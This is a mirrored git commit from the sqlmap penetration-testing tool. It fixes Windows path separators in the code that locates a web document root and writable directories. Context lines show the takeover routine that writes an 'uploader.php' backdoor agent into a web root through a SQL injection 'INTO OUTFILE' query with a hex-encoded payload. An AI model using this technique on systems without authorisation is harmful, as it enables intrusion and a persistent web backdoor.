mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
Minor syntax adjustment for web backdoor functionality
This commit is contained in:
parent
58f3eee390
commit
57b8bb4c8e
|
@ -228,7 +228,7 @@ def getDocRoot():
|
||||||
pagePath = os.path.dirname(conf.path)
|
pagePath = os.path.dirname(conf.path)
|
||||||
|
|
||||||
if kb.os == "Windows":
|
if kb.os == "Windows":
|
||||||
defaultDocRoot = "C:\\Inetput\\wwwroot\\"
|
defaultDocRoot = "C:/Inetpub/wwwroot/"
|
||||||
else:
|
else:
|
||||||
defaultDocRoot = "/var/www/"
|
defaultDocRoot = "/var/www/"
|
||||||
|
|
||||||
|
@ -247,7 +247,7 @@ def getDocRoot():
|
||||||
docRoot = absFilePath[:index]
|
docRoot = absFilePath[:index]
|
||||||
|
|
||||||
if absFilePathWin:
|
if absFilePathWin:
|
||||||
docRoot = "C:\\%s" % docRoot.replace("/", "\\")
|
docRoot = "C:/%s" % docRoot.replace("\\", "/")
|
||||||
|
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -274,7 +274,7 @@ def getDirs():
|
||||||
directories = set()
|
directories = set()
|
||||||
|
|
||||||
if kb.os == "Windows":
|
if kb.os == "Windows":
|
||||||
defaultDir = "C:\\Inetput\\wwwroot\\test\\"
|
defaultDir = "C:/Inetpub/wwwroot/test/"
|
||||||
else:
|
else:
|
||||||
defaultDir = "/var/www/test/"
|
defaultDir = "/var/www/test/"
|
||||||
|
|
||||||
|
|
|
@ -137,14 +137,9 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
|
||||||
uploaderName = "uploader.php"
|
uploaderName = "uploader.php"
|
||||||
uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
|
uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
|
||||||
|
|
||||||
if kb.os == "Windows":
|
|
||||||
sep = "\\\\"
|
|
||||||
else:
|
|
||||||
sep = "/"
|
|
||||||
|
|
||||||
for directory in directories:
|
for directory in directories:
|
||||||
# Upload the uploader agent
|
# Upload the uploader agent
|
||||||
outFile = os.path.normpath("%s%s%s" % (directory, sep, uploaderName))
|
outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
|
||||||
uplQuery = uploaderStr.replace("WRITABLE_DIR", directory)
|
uplQuery = uploaderStr.replace("WRITABLE_DIR", directory)
|
||||||
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
|
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
|
||||||
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
||||||
|
|
Loading…
Reference in New Issue
Block a user